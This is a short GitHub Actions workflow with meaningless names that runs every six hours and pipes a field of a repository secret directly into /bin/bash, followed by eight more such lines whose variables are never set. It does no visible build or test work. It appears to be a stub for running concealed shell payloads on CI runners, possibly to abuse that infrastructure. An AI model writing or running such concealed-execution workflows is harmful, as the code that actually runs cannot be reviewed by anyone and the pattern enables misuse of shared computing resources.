name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '23 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          zw5248: ${{ secrets.zw5248 }}
        run: |
          echo $zw5248 | jq -r .h8 | /bin/bash
          echo $vbz93 | jq -r .fkljv00 | /bin/bash
          echo $pr56 | jq -r .ymb278 | /bin/bash
          echo $l438 | jq -r .axg76 | /bin/bash
          echo $e3 | jq -r .dm71340 | /bin/bash
          echo $orkf95964 | jq -r .razq95523 | /bin/bash
          echo $f7 | jq -r .ax7 | /bin/bash
          echo $mmhhk955 | jq -r .hd50 | /bin/bash
          echo $ifao3 | jq -r .wd60 | /bin/bash

